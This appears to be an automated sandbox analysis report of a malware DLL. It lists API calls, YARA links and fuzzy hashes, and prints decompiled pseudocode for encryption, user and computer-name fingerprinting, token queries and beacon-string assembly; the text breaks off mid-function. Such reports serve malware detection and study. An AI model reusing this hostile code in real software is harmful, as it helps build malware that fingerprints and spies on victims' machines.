Part of subcall function 6E1ECE87: CreateFileW.KERNEL32(6E248A58,40000000,00000003,00000000,00000003,00000000,00000000,6E1ECEB6,6E1EC59E,00000000,?,6E1E609F,00000000,?,00000000,00000000), ref: 6E1ECE9A

WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,6E1EC5B1,00000000,00000001,00000000,00000000,?,6E1E609F,00000000,?,00000000,00000000), ref: 6E1ECF24

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 9c2b45210cdd590a19f3d0c82ab28f4a62c34f950b6947fd39438f2c34fb7828
Instruction ID: cfc767f5b64cee28b415d6ca9c11b3d07a1c97d2c382ba9808c35f83e0b1e514
Opcode Fuzzy Hash: 9c2b45210cdd590a19f3d0c82ab28f4a62c34f950b6947fd39438f2c34fb7828
Instruction Fuzzy Hash: A4F0A237501968BBCF176FE5CC089DA3FA7EB197A5B544414FA189A520C7718860EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CC3FA, Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1CC403

Part of subcall function 6E1D621F: HeapFree.KERNEL32(00000000,00000000,?,6E1E3B19,?,00000000,?,?,?,6E1E3E1D,?,00000007,?,?,6E1E2465,?), ref: 6E1D6235
Part of subcall function 6E1D621F: GetLastError.KERNEL32(?,?,6E1E3B19,?,00000000,?,?,?,6E1E3E1D,?,00000007,?,?,6E1E2465,?,?), ref: 6E1D6247

_free.LIBCMT ref: 6E1CC416
_free.LIBCMT ref: 6E1CC427
_free.LIBCMT ref: 6E1CC438

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 63bfdf6e2a137d2aa1be2301c395d80ae104d3458ee00472bebe1b547277ec61
Instruction ID: 1618c295d8c0c887079e8bdc1e3121ef0c73da59bc8495265e9b4025ecb1c7b2
Opcode Fuzzy Hash: 63bfdf6e2a137d2aa1be2301c395d80ae104d3458ee00472bebe1b547277ec61
Instruction Fuzzy Hash: 51E04FBA42E934DAEF519F50C45C4873B67B766A10320058BE42002230C7351092EFA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D8BC5, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 355COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1D8FCA
_free.LIBCMT ref: 6E1D901F

Strings

-, xrefs: 6E1D8E6D

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: _free
String ID: -
API String ID: 269201875-2547889144
Opcode ID: 41101eb42ef822f191d93fa66e63e398c4abbff3032988c7ba67806419e67b8d
Instruction ID: ae8a7e925d162a25b730e965872f819d2ea2e1437561eb65ac13080433573e3a
Opcode Fuzzy Hash: 41101eb42ef822f191d93fa66e63e398c4abbff3032988c7ba67806419e67b8d
Instruction Fuzzy Hash: 43C1F97190021A9BDB64DFE4CC50BEEB3B9FF25708F2054AAD805D7184EB319AC9EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1BFA2A, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 274COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 6E1BFB82

Strings

+, xrefs: 6E1BFAD8
-, xrefs: 6E1BFACB

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: e4ecf5e4f62a9fa5bff1bc43e37526cd573115b7161018b485ecbb65d1732e6d
Instruction ID: c2411267401f2593ef3fa13184b2a3ad8f0b265d063acf47180e1a8dbe0539c8
Opcode Fuzzy Hash: e4ecf5e4f62a9fa5bff1bc43e37526cd573115b7161018b485ecbb65d1732e6d
Instruction Fuzzy Hash: FF91E5399401199ECB00CEF9CCA0ADDBB75FF5A324F74861AE874AB284D73499C6E750

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C02DE, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 274COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 6E1C0436

Strings

+, xrefs: 6E1C038C
-, xrefs: 6E1C037F

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 5698b121c01f62f030d8240604d9e7f15f5b34697c1c71bc998bd1dead7db752
Instruction ID: 7ca323f905ba7b84f8c8e9a877a9839946ebc1cd370cc3acf2224340fbad32f7
Opcode Fuzzy Hash: 5698b121c01f62f030d8240604d9e7f15f5b34697c1c71bc998bd1dead7db752
Instruction Fuzzy Hash: 9591C2B0D442199FCF00CFE9C8506DE7BB5AF76B24F254619E464E7284E73899C2EB12

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CA066, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 6E1CA1D1

Strings

+, xrefs: 6E1CA10C
-, xrefs: 6E1CA0FF

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: d47bfdae694c3e1c58a06dceb2a2d82ef8e2cd1ccf0e31635b789d214d18a3b2
Instruction ID: 04d3e9a7c8c32aab4381006adda036104e921e6790095c76f7df7f1cab65c758
Opcode Fuzzy Hash: d47bfdae694c3e1c58a06dceb2a2d82ef8e2cd1ccf0e31635b789d214d18a3b2
Instruction Fuzzy Hash: 1F9117309441199EDF02CEE9C8606DDBBB4EF72B20F144646E876D7290D3398981EB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CB223, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6E1CB266, 6E1CB26D, 6E1CB2A3

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID: C:\Windows\SYSTEM32\loaddll32.exe
API String ID: 0-1872383224
Opcode ID: e2dd79b8fff55152d2ad9f1c11a56b141fad5b508c46d50dabb2e044124758d4
Instruction ID: 230bc36a2ac5a7d5b9eaa593443092ec79b1b5f270539c0df7f0de769d875c63
Opcode Fuzzy Hash: e2dd79b8fff55152d2ad9f1c11a56b141fad5b508c46d50dabb2e044124758d4
Instruction Fuzzy Hash: F941A571A18614AFDB11DFD9C884D9EBBBDFFA5B00B20086AE400D7204E7749A85EB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D55A4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1D55D2
_free.LIBCMT ref: 6E1D55F8

Strings

X'n, xrefs: 6E1D5611

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: _free
String ID: X'n
API String ID: 269201875-63157890
Opcode ID: fdc974dd16ead463c79411c07b59f3670526d79bc3e054a1ff4caaab31ebd218
Instruction ID: fa08b1f5be5daf4593cb910bd0a0172d7b906b0ae626c16e6232845fb77e153f
Opcode Fuzzy Hash: fdc974dd16ead463c79411c07b59f3670526d79bc3e054a1ff4caaab31ebd218
Instruction Fuzzy Hash: 7911E975A9C6219BEF10CAA8AC09B8633A6E753734F340A15E534DB1C0E370D9C996A5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 5564 Parent PID: 5460 rundll32.exeCOMMON

Executed Functions

Function 030839C5, Relevance: 18.2, APIs: 12, Instructions: 163
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E030839C5(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				void* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				void* _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				void* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x308a0dc( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x308a0b8() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E03086837(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 =  *0x308a0b0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x308a0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 = _t102 + _t90;
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E030850CA(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}

0x030839ce
0x030839d4
0x030839d7
0x030839dd
0x030839dd
0x030839df
0x030839e1
0x030839e4
0x030839ea
0x030839eb
0x030839ec
0x030839f2
0x030839f7
0x030839fd
0x03083a05
0x03083b62
0x03083a0b
0x03083a0d
0x03083a16
0x03083a1b
0x03083a2d
0x03083a30
0x03083a34
0x03083a3b
0x03083a3f
0x03083a47
0x03083b4d
0x03083a4d
0x03083a4d
0x03083a51
0x03083a52
0x03083a54
0x03083a5f
0x03083b39
0x03083a65
0x03083a65
0x03083a68
0x03083a6e
0x03083a74
0x03083a74
0x03083a7c
0x03083a80
0x03083a83
0x03083b2a
0x03083a89
0x03083a8f
0x03083a92
0x03083a95
0x03083a97
0x03083a9a
0x03083a9d
0x03083a9f
0x03083a9f
0x03083aa9
0x03083aae
0x03083ab1
0x03083ab4
0x03083ab6
0x03083abf
0x03083ae9
0x03083ac1
0x03083ad2
0x03083ad2
0x03083af1
0x00000000
0x00000000
0x03083af3
0x03083af6
0x03083af9
0x03083afd
0x00000000
0x03083aff
0x03083b0e
0x03083b14
0x03083b1c
0x03083b1c
0x00000000
0x03083afd
0x03083b01
0x03083b09
0x03083b0c
0x03083b23
0x00000000
0x00000000
0x00000000
0x03083b0c
0x03083a83
0x03083b3c
0x03083b3f
0x03083b3f
0x03083b54
0x03083b54
0x03083b6c

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,03084A23,00000001,030870D9,00000000), ref: 030839FD
memcpy.NTDLL(03084A23,030870D9,00000010,?,?,?,03084A23,00000001,030870D9,00000000,?,030862B1,00000000,030870D9,?,00000000), ref: 03083A16
CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 03083A3F
CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 03083A57
memcpy.NTDLL(00000000,00000000,05BB9630,00000010), ref: 03083AA9
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,05BB9630,00000020,?,?,00000010), ref: 03083AD2
GetLastError.KERNEL32(?,?,00000010), ref: 03083B01
GetLastError.KERNEL32 ref: 03083B33
CryptDestroyKey.ADVAPI32(00000000), ref: 03083B3F
GetLastError.KERNEL32 ref: 03083B47
CryptReleaseContext.ADVAPI32(?,00000000), ref: 03083B54
GetLastError.KERNEL32(?,?,?,03084A23,00000001,030870D9,00000000,?,030862B1,00000000,030870D9,?,00000000,030870D9,00000000,05BB9630), ref: 03083B5C

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
String ID:
API String ID: 3401600162-0
Opcode ID: 5922e8ba090ba991d6b68ba418fae1fcba565870d093cef04195edced0971e5e
Instruction ID: f41ab6d25c5233f9cf360b4e106d8e3a3ce8b94524f3b22f25b15d98835dcab8
Opcode Fuzzy Hash: 5922e8ba090ba991d6b68ba418fae1fcba565870d093cef04195edced0971e5e
Instruction Fuzzy Hash: B0514CB9901208FFDB10EFA8DC84AEEBBB9EB44750F048466F981E6240D7359A14DF21

Uniqueness

Uniqueness Score: -1.00%

Function 6E280A6A, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,000006BB,00003000,00000040,000006BB,6E2804C0), ref: 6E280B27
VirtualAlloc.KERNEL32(00000000,00000304,00003000,00000040,6E280523), ref: 6E280B5E
VirtualAlloc.KERNEL32(00000000,0000EC47,00003000,00000040), ref: 6E280BBE
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E280BF4
VirtualProtect.KERNEL32(6E1B0000,00000000,00000004,6E280A49), ref: 6E280CF9
VirtualProtect.KERNEL32(6E1B0000,00001000,00000004,6E280A49), ref: 6E280D20
VirtualProtect.KERNEL32(00000000,?,00000002,6E280A49), ref: 6E280DED
VirtualProtect.KERNEL32(00000000,?,00000002,6E280A49,?), ref: 6E280E43
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E280E5F

Memory Dump Source

Source File: 00000004.00000002.476547556.000000006E280000.00000040.00020000.sdmp, Offset: 6E280000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 9e2c22e36acf44babe5495147b7aa9867cbdf17ed0ed428ecd2cc3310a4e75e3
Instruction ID: 09cd96681927d3f2610c6f18677cfd4fb1a082fbf3282f615a6ac4f1cbee3497
Opcode Fuzzy Hash: 9e2c22e36acf44babe5495147b7aa9867cbdf17ed0ed428ecd2cc3310a4e75e3
Instruction Fuzzy Hash: 0DD14676201301AFEB19CF98C880B5277A6FF4A710B1941D7ED0DAF69AE770AC15CB64

Uniqueness

Uniqueness Score: -1.00%

Function 03084454, Relevance: 12.1, APIs: 8, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E03084454(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x308a2c8; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E0308143F( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x308a2d0 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x308a290, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E0308283A(_v8 + _v8, _t63);
							}
							HeapFree( *0x308a290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x308a290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E0308283A(_v8 + _v8, _t63);
						}
						HeapFree( *0x308a290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x03084454
0x0308445c
0x03084462
0x03084465
0x03084468
0x0308446a
0x0308446f
0x0308446f
0x03084475
0x03084477
0x03084484
0x030844e5
0x03084486
0x0308448b
0x03084491
0x03084496
0x030844a4
0x030844a8
0x030844b7
0x030844be
0x030844c5
0x030844c5
0x030844d0
0x030844d0
0x030844a8
0x03084496
0x030844e7
0x030844ed
0x030844f7
0x030844f9
0x030844fe
0x0308450d
0x03084511
0x0308451c
0x03084523
0x0308452a
0x0308452a
0x03084536
0x03084536
0x03084511
0x0308453f
0x03084541
0x03084544
0x03084546
0x03084549
0x0308454c
0x03084556
0x0308455a
0x0308455e

APIs

GetUserNameW.ADVAPI32(00000000,030855CE), ref: 0308448B
RtlAllocateHeap.NTDLL(00000000,030855CE), ref: 030844A2
GetUserNameW.ADVAPI32(00000000,030855CE), ref: 030844AF
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,030855CE,?,?,?,?,?,03086BD8,?,00000001), ref: 030844D0
GetComputerNameW.KERNEL32(00000000,00000000), ref: 030844F7
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0308450B
GetComputerNameW.KERNEL32(00000000,00000000), ref: 03084518
HeapFree.KERNEL32(00000000,00000000), ref: 03084536

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: 9b23ebd22eed5281cbef1e5707b0f3ed0845e77c85e79ca7821cf6104bba675b
Instruction ID: 7ef37333c7ffbbfc542d088773bacc25ad59350961c0bf7d5a23b16d88db8a6e
Opcode Fuzzy Hash: 9b23ebd22eed5281cbef1e5707b0f3ed0845e77c85e79ca7821cf6104bba675b
Instruction Fuzzy Hash: 23311C71A0220AEFDB21EFA9DC80AAEB7F9FF44710F244469E585D7610DB35DA109B10

Uniqueness

Uniqueness Score: -1.00%

Function 03082D06, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E03082D06(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E03086837(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E030850CA(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x03082d13
0x03082d14
0x03082d15
0x03082d16
0x03082d17
0x03082d1b
0x03082d22
0x03082d31
0x03082d34
0x03082d37
0x03082d3e
0x03082d41
0x03082d44
0x03082d47
0x03082d4a
0x03082d55
0x03082d57
0x03082d60
0x03082d68
0x03082d6a
0x03082d7c
0x03082d86
0x03082d8a
0x03082d99
0x03082d9d
0x03082da6
0x03082dae
0x03082dae
0x03082db0
0x03082db0
0x03082db8
0x03082dbe
0x03082dc2
0x03082dc2
0x03082dcd

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 03082D4D
NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 03082D60
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 03082D7C

Part of subcall function 03086837: RtlAllocateHeap.NTDLL(00000000,00000000,03084197), ref: 03086843

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 03082D99
memcpy.NTDLL(00000000,00000000,0000001C), ref: 03082DA6
NtClose.NTDLL(00000000), ref: 03082DB8
NtClose.NTDLL(00000000), ref: 03082DC2

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 9991a5ce7be3fc03b4d2f8977d903dd9c4ab1f740a57fe66c228c0786d067763
Instruction ID: a36bfbdf30262d770e94723f8fadc55106f9910b78ed3c7c97c898ece5f51276
Opcode Fuzzy Hash: 9991a5ce7be3fc03b4d2f8977d903dd9c4ab1f740a57fe66c228c0786d067763
Instruction Fuzzy Hash: 2B2105B6901228BBDF01EF94CC84DDEBFBDEF48750F104062FA45A6254D7759A409BA0

Uniqueness

Uniqueness Score: -1.00%

Function 030846D1, Relevance: 33.3, APIs: 22, Instructions: 262
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E030846D1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t102;
				void* _t107;
				intOrPtr _t111;
				signed int _t115;
				char** _t117;
				int _t120;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t135;
				int _t138;
				intOrPtr _t139;
				int _t142;
				void* _t143;
				void* _t144;
				void* _t154;
				int _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				intOrPtr _t161;
				void* _t163;
				long _t167;
				intOrPtr* _t168;
				intOrPtr* _t171;
				void* _t172;
				void* _t174;
				void* _t175;
				void* _t180;

				_t154 = __edx;
				_t144 = __ecx;
				_t63 = __eax;
				_t143 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x308a018; // 0x7c284a1c
				asm("bswap eax");
				_t65 =  *0x308a014; // 0x5cb11ae7
				asm("bswap eax");
				_t66 =  *0x308a010; // 0x15dc9586
				asm("bswap eax");
				_t67 =  *0x308a00c; // 0x8e03bf7
				asm("bswap eax");
				_t68 =  *0x308a2d4; // 0x2b2d5a8
				_t3 = _t68 + 0x308b613; // 0x74666f73
				_t157 = wsprintfA(_t143, _t3, 3, 0x3d15c, _t67, _t66, _t65, _t64,  *0x308a02c,  *0x308a004, _t63);
				_t71 = E03086A09();
				_t72 =  *0x308a2d4; // 0x2b2d5a8
				_t4 = _t72 + 0x308b653; // 0x74707526
				_t75 = wsprintfA(_t157 + _t143, _t4, _t71);
				_t174 = _t172 + 0x38;
				_t158 = _t157 + _t75;
				if(_a8 != 0) {
					_t139 =  *0x308a2d4; // 0x2b2d5a8
					_t8 = _t139 + 0x308b65e; // 0x732526
					_t142 = wsprintfA(_t158 + _t143, _t8, _a8);
					_t174 = _t174 + 0xc;
					_t158 = _t158 + _t142;
				}
				_t76 = E03085040(_t144);
				_t77 =  *0x308a2d4; // 0x2b2d5a8
				_t10 = _t77 + 0x308b302; // 0x6d697426
				_t159 = _t158 + wsprintfA(_t158 + _t143, _t10, _t76, _t154);
				_t81 =  *0x308a2d4; // 0x2b2d5a8
				_t12 = _t81 + 0x308b7aa; // 0x5bb8d52
				_t180 = _a4 - _t12;
				_t14 = _t81 + 0x308b2d7; // 0x74636126
				_t156 = 0 | _t180 == 0x00000000;
				_t160 = _t159 + wsprintfA(_t159 + _t143, _t14, _t180 == 0);
				_t85 =  *0x308a31c; // 0x5bb95e0
				_t175 = _t174 + 0x1c;
				if(_t85 != 0) {
					_t135 =  *0x308a2d4; // 0x2b2d5a8
					_t18 = _t135 + 0x308b8da; // 0x3d736f26
					_t138 = wsprintfA(_t160 + _t143, _t18, _t85);
					_t175 = _t175 + 0xc;
					_t160 = _t160 + _t138;
				}
				_t86 =  *0x308a32c; // 0x5bb95b0
				if(_t86 != 0) {
					_t132 =  *0x308a2d4; // 0x2b2d5a8
					_t20 = _t132 + 0x308b676; // 0x73797326
					wsprintfA(_t160 + _t143, _t20, _t86);
					_t175 = _t175 + 0xc;
				}
				_t161 =  *0x308a37c; // 0x5bb9630
				_t88 = E03082885(0x308a00a, _t161 + 4);
				_t167 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					RtlFreeHeap( *0x308a290, _t167, _t143); // executed
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0x308a290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0x308a290, _t167, _v12);
						goto L28;
					}
					E03082DD0(GetTickCount());
					_t95 =  *0x308a37c; // 0x5bb9630
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0x308a37c; // 0x5bb9630
					__imp__(_t99 + 0x40);
					_t101 =  *0x308a37c; // 0x5bb9630
					_t102 = E0308624D(1, _t156, _t143,  *_t101); // executed
					_t163 = _t102;
					_v20 = _t163;
					asm("lock xadd [eax], ecx");
					if(_t163 == 0) {
						L26:
						RtlFreeHeap( *0x308a290, _t167, _a8); // executed
						goto L27;
					}
					StrTrimA(_t163, 0x30892ac);
					_push(_t163);
					_t107 = E030821C1();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						RtlFreeHeap( *0x308a290, _t167, _t163); // executed
						goto L26;
					}
					 *_t163 = 0;
					__imp__(_a8, _v12);
					_t168 = __imp__;
					 *_t168(_a8, _v8);
					_t111 = E03084AA6( *_t168(_a8, _t163), _a8);
					_a4 = _t111;
					if(_t111 == 0) {
						_a20 = 8;
						L23:
						E03081492();
						L24:
						HeapFree( *0x308a290, 0, _v8);
						_t167 = 0;
						goto L25;
					}
					_t115 = E030826C9(_t143, 0xffffffffffffffff, _t163,  &_v16); // executed
					_a20 = _t115;
					if(_t115 == 0) {
						_t171 = _v16;
						_a20 = E0308161A(_t171, _a4, _a12, _a16);
						_t123 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
						_t125 =  *((intOrPtr*)(_t171 + 8));
